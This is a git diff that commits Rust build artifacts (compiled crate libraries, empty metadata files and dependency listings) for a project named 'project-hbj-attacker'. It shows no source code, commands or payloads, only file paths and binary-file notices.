diff --git a/01/project-hbj-attacker/target/debug/deps/libdynasmrt-c0557e3efcfa09bd.rmeta b/01/project-hbj-attacker/target/debug/deps/libdynasmrt-c0557e3efcfa09bd.rmeta
new file mode 100644
index 0000000..97d19c2
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libdynasmrt-c0557e3efcfa09bd.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libfnv-2f01830a992dc6e2.rmeta b/01/project-hbj-attacker/target/debug/deps/libfnv-2f01830a992dc6e2.rmeta
new file mode 100644
index 0000000..673049a
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libfnv-2f01830a992dc6e2.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libfnv-4bf9ac57e0281eeb.rlib b/01/project-hbj-attacker/target/debug/deps/libfnv-4bf9ac57e0281eeb.rlib
new file mode 100644
index 0000000..eba65d4
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libfnv-4bf9ac57e0281eeb.rlib differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libfnv-4bf9ac57e0281eeb.rmeta b/01/project-hbj-attacker/target/debug/deps/libfnv-4bf9ac57e0281eeb.rmeta
new file mode 100644
index 0000000..c955390
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libfnv-4bf9ac57e0281eeb.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libiced_x86-a16a90362048bddf.rlib b/01/project-hbj-attacker/target/debug/deps/libiced_x86-a16a90362048bddf.rlib
new file mode 100644
index 0000000..2dd455d
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libiced_x86-a16a90362048bddf.rlib differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libiced_x86-a16a90362048bddf.rmeta b/01/project-hbj-attacker/target/debug/deps/libiced_x86-a16a90362048bddf.rmeta
new file mode 100644
index 0000000..73d4ce3
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libiced_x86-a16a90362048bddf.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libiced_x86-a996d80c3efd4f81.rmeta b/01/project-hbj-attacker/target/debug/deps/libiced_x86-a996d80c3efd4f81.rmeta
new file mode 100644
index 0000000..49c680a
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libiced_x86-a996d80c3efd4f81.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libiced_x86-ce35e8322c266bad.rmeta b/01/project-hbj-attacker/target/debug/deps/libiced_x86-ce35e8322c266bad.rmeta
new file mode 100644
index 0000000..2e99676
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libiced_x86-ce35e8322c266bad.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/liblazy_static-0aeb88bcc2e3d662.rlib b/01/project-hbj-attacker/target/debug/deps/liblazy_static-0aeb88bcc2e3d662.rlib
new file mode 100644
index 0000000..3166f27
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/liblazy_static-0aeb88bcc2e3d662.rlib differ
diff --git a/01/project-hbj-attacker/target/debug/deps/liblazy_static-0aeb88bcc2e3d662.rmeta b/01/project-hbj-attacker/target/debug/deps/liblazy_static-0aeb88bcc2e3d662.rmeta
new file mode 100644
index 0000000..8b0efb8
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/liblazy_static-0aeb88bcc2e3d662.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/liblazy_static-4f23730150718286.rlib b/01/project-hbj-attacker/target/debug/deps/liblazy_static-4f23730150718286.rlib
new file mode 100644
index 0000000..99af8ab
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/liblazy_static-4f23730150718286.rlib differ
diff --git a/01/project-hbj-attacker/target/debug/deps/liblazy_static-4f23730150718286.rmeta b/01/project-hbj-attacker/target/debug/deps/liblazy_static-4f23730150718286.rmeta
new file mode 100644
index 0000000..74a62af
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/liblazy_static-4f23730150718286.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/liblazy_static-d550ab0b2fa2a527.rmeta b/01/project-hbj-attacker/target/debug/deps/liblazy_static-d550ab0b2fa2a527.rmeta
new file mode 100644
index 0000000..e990cc6
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/liblazy_static-d550ab0b2fa2a527.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/liblibc-4ae08a1ad5ce0106.rmeta b/01/project-hbj-attacker/target/debug/deps/liblibc-4ae08a1ad5ce0106.rmeta
new file mode 100644
index 0000000..e9fdd2f
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/liblibc-4ae08a1ad5ce0106.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/liblibc-f1dd82928ca28e39.rlib b/01/project-hbj-attacker/target/debug/deps/liblibc-f1dd82928ca28e39.rlib
new file mode 100644
index 0000000..df68fe1
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/liblibc-f1dd82928ca28e39.rlib differ
diff --git a/01/project-hbj-attacker/target/debug/deps/liblibc-f1dd82928ca28e39.rmeta b/01/project-hbj-attacker/target/debug/deps/liblibc-f1dd82928ca28e39.rmeta
new file mode 100644
index 0000000..fa1f677
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/liblibc-f1dd82928ca28e39.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/liblibloading-00e5bd6415ed9c43.rlib b/01/project-hbj-attacker/target/debug/deps/liblibloading-00e5bd6415ed9c43.rlib
new file mode 100644
index 0000000..390de28
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/liblibloading-00e5bd6415ed9c43.rlib differ
diff --git a/01/project-hbj-attacker/target/debug/deps/liblibloading-00e5bd6415ed9c43.rmeta b/01/project-hbj-attacker/target/debug/deps/liblibloading-00e5bd6415ed9c43.rmeta
new file mode 100644
index 0000000..89bd50f
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/liblibloading-00e5bd6415ed9c43.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/liblibloading-0f2f8e24f8a6212c.rmeta b/01/project-hbj-attacker/target/debug/deps/liblibloading-0f2f8e24f8a6212c.rmeta
new file mode 100644
index 0000000..f3aa70b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/liblibloading-0f2f8e24f8a6212c.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libloading-00e5bd6415ed9c43.d b/01/project-hbj-attacker/target/debug/deps/libloading-00e5bd6415ed9c43.d
new file mode 100644
index 0000000..f39076b
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/libloading-00e5bd6415ed9c43.d
@@ -0,0 +1,14 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libloading-00e5bd6415ed9c43.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/changelog.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/error.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/os/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/os/unix/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/os/unix/consts.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/safe.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/util.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/liblibloading-00e5bd6415ed9c43.rlib: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/changelog.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/error.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/os/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/os/unix/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/os/unix/consts.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/safe.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/util.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/liblibloading-00e5bd6415ed9c43.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/changelog.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/error.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/os/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/os/unix/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/os/unix/consts.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/safe.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/util.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/changelog.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/error.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/os/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/os/unix/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/os/unix/consts.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/safe.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/util.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/libloading-0f2f8e24f8a6212c.d b/01/project-hbj-attacker/target/debug/deps/libloading-0f2f8e24f8a6212c.d
new file mode 100644
index 0000000..feb8b8e
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/libloading-0f2f8e24f8a6212c.d
@@ -0,0 +1,12 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libloading-0f2f8e24f8a6212c.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/changelog.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/error.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/os/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/os/unix/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/os/unix/consts.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/safe.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/util.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/liblibloading-0f2f8e24f8a6212c.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/changelog.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/error.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/os/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/os/unix/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/os/unix/consts.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/safe.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/util.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/changelog.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/error.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/os/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/os/unix/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/os/unix/consts.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/safe.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/libloading-0.8.9/src/util.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/libmemmap2-2566ac7e0df66894.rlib b/01/project-hbj-attacker/target/debug/deps/libmemmap2-2566ac7e0df66894.rlib
new file mode 100644
index 0000000..58cb49a
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libmemmap2-2566ac7e0df66894.rlib differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libmemmap2-2566ac7e0df66894.rmeta b/01/project-hbj-attacker/target/debug/deps/libmemmap2-2566ac7e0df66894.rmeta
new file mode 100644
index 0000000..f9fdad1
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libmemmap2-2566ac7e0df66894.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libmemmap2-68530ff6c8c70627.rmeta b/01/project-hbj-attacker/target/debug/deps/libmemmap2-68530ff6c8c70627.rmeta
new file mode 100644
index 0000000..1423f9e
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libmemmap2-68530ff6c8c70627.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libnix-108c2ce175e78b93.rlib b/01/project-hbj-attacker/target/debug/deps/libnix-108c2ce175e78b93.rlib
new file mode 100644
index 0000000..578bc68
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libnix-108c2ce175e78b93.rlib differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libnix-108c2ce175e78b93.rmeta b/01/project-hbj-attacker/target/debug/deps/libnix-108c2ce175e78b93.rmeta
new file mode 100644
index 0000000..46f1488
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libnix-108c2ce175e78b93.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libnix-1e5da1ae136c1959.rlib b/01/project-hbj-attacker/target/debug/deps/libnix-1e5da1ae136c1959.rlib
new file mode 100644
index 0000000..49870a8
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libnix-1e5da1ae136c1959.rlib differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libnix-1e5da1ae136c1959.rmeta b/01/project-hbj-attacker/target/debug/deps/libnix-1e5da1ae136c1959.rmeta
new file mode 100644
index 0000000..e1156de
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libnix-1e5da1ae136c1959.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libnix-436eee196b17bbd6.rmeta b/01/project-hbj-attacker/target/debug/deps/libnix-436eee196b17bbd6.rmeta
new file mode 100644
index 0000000..7a4e8b7
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libnix-436eee196b17bbd6.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libnix-eafb603039cb05f6.rmeta b/01/project-hbj-attacker/target/debug/deps/libnix-eafb603039cb05f6.rmeta
new file mode 100644
index 0000000..1d3421f
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libnix-eafb603039cb05f6.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libnix-f71316321b63dde7.rmeta b/01/project-hbj-attacker/target/debug/deps/libnix-f71316321b63dde7.rmeta
new file mode 100644
index 0000000..906fbe1
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libnix-f71316321b63dde7.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libproc_macro2-0225ebeb9d18aa18.rlib b/01/project-hbj-attacker/target/debug/deps/libproc_macro2-0225ebeb9d18aa18.rlib
new file mode 100644
index 0000000..47003a0
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libproc_macro2-0225ebeb9d18aa18.rlib differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libproc_macro2-0225ebeb9d18aa18.rmeta b/01/project-hbj-attacker/target/debug/deps/libproc_macro2-0225ebeb9d18aa18.rmeta
new file mode 100644
index 0000000..9f86a72
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libproc_macro2-0225ebeb9d18aa18.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libproc_macro_error2-55e4f1d46a8a5c63.rlib b/01/project-hbj-attacker/target/debug/deps/libproc_macro_error2-55e4f1d46a8a5c63.rlib
new file mode 100644
index 0000000..47a6b14
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libproc_macro_error2-55e4f1d46a8a5c63.rlib differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libproc_macro_error2-55e4f1d46a8a5c63.rmeta b/01/project-hbj-attacker/target/debug/deps/libproc_macro_error2-55e4f1d46a8a5c63.rmeta
new file mode 100644
index 0000000..6351ef8
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libproc_macro_error2-55e4f1d46a8a5c63.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libproc_macro_error_attr2-eaefd73d796b2801.so b/01/project-hbj-attacker/target/debug/deps/libproc_macro_error_attr2-eaefd73d796b2801.so
new file mode 100755
index 0000000..9010c00
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libproc_macro_error_attr2-eaefd73d796b2801.so differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-03476cb36fbc5238.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-03476cb36fbc5238.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-0531b6d159b9dc84.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-0531b6d159b9dc84.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-0dae6fb844b6e156.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-0dae6fb844b6e156.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-138dced13c0ab27a.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-138dced13c0ab27a.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-16fc8141eb52a768.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-16fc8141eb52a768.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-187f40608df38efc.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-187f40608df38efc.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-206306ee5eb62a04.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-206306ee5eb62a04.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-2278d8080922a319.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-2278d8080922a319.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-28644bcd824d9d0c.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-28644bcd824d9d0c.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-35a108fdfad73814.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-35a108fdfad73814.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-39794b693e707518.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-39794b693e707518.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-3e048006053403e8.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-3e048006053403e8.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-4a94058ae5fb6c1b.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-4a94058ae5fb6c1b.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-4eda4ecb58543ea6.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-4eda4ecb58543ea6.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-53852b4f0048cbb7.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-53852b4f0048cbb7.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-5a494607dc84530f.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-5a494607dc84530f.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-6511559cb3af9165.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-6511559cb3af9165.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-8d3f1eaf7577bb99.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-8d3f1eaf7577bb99.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-8ea09dd0e71f5ec6.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-8ea09dd0e71f5ec6.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-93e4ff1eedef5ef2.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-93e4ff1eedef5ef2.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-a64302973ba63c21.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-a64302973ba63c21.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-b1d345c5490fb68e.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-b1d345c5490fb68e.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-b90d88b1484a19ce.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-b90d88b1484a19ce.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-bc7bc8543b7ae63f.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-bc7bc8543b7ae63f.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-d211ab56812d141c.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-d211ab56812d141c.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-e8cfde2a74014fc7.rmeta b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker-e8cfde2a74014fc7.rmeta
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker.so b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker.so
new file mode 100755
index 0000000..b448920
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libproject_hbj_attacker.so differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libquote-d24ddd1b0bd9b43a.rlib b/01/project-hbj-attacker/target/debug/deps/libquote-d24ddd1b0bd9b43a.rlib
new file mode 100644
index 0000000..72b7a56
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libquote-d24ddd1b0bd9b43a.rlib differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libquote-d24ddd1b0bd9b43a.rmeta b/01/project-hbj-attacker/target/debug/deps/libquote-d24ddd1b0bd9b43a.rmeta
new file mode 100644
index 0000000..f5e8b22
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libquote-d24ddd1b0bd9b43a.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libsyn-df895b4c5a72e2c4.rlib b/01/project-hbj-attacker/target/debug/deps/libsyn-df895b4c5a72e2c4.rlib
new file mode 100644
index 0000000..5084dbc
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libsyn-df895b4c5a72e2c4.rlib differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libsyn-df895b4c5a72e2c4.rmeta b/01/project-hbj-attacker/target/debug/deps/libsyn-df895b4c5a72e2c4.rmeta
new file mode 100644
index 0000000..2c8a785
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libsyn-df895b4c5a72e2c4.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libunicode_ident-f1c0f7cb8d2e950d.rlib b/01/project-hbj-attacker/target/debug/deps/libunicode_ident-f1c0f7cb8d2e950d.rlib
new file mode 100644
index 0000000..af64ed1
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libunicode_ident-f1c0f7cb8d2e950d.rlib differ
diff --git a/01/project-hbj-attacker/target/debug/deps/libunicode_ident-f1c0f7cb8d2e950d.rmeta b/01/project-hbj-attacker/target/debug/deps/libunicode_ident-f1c0f7cb8d2e950d.rmeta
new file mode 100644
index 0000000..1191064
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/deps/libunicode_ident-f1c0f7cb8d2e950d.rmeta differ
diff --git a/01/project-hbj-attacker/target/debug/deps/memmap2-2566ac7e0df66894.d b/01/project-hbj-attacker/target/debug/deps/memmap2-2566ac7e0df66894.d
new file mode 100644
index 0000000..555d812
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/memmap2-2566ac7e0df66894.d
@@ -0,0 +1,9 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/memmap2-2566ac7e0df66894.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/memmap2-0.9.9/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/memmap2-0.9.9/src/unix.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/memmap2-0.9.9/src/advice.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libmemmap2-2566ac7e0df66894.rlib: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/memmap2-0.9.9/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/memmap2-0.9.9/src/unix.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/memmap2-0.9.9/src/advice.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libmemmap2-2566ac7e0df66894.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/memmap2-0.9.9/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/memmap2-0.9.9/src/unix.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/memmap2-0.9.9/src/advice.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/memmap2-0.9.9/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/memmap2-0.9.9/src/unix.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/memmap2-0.9.9/src/advice.rs:
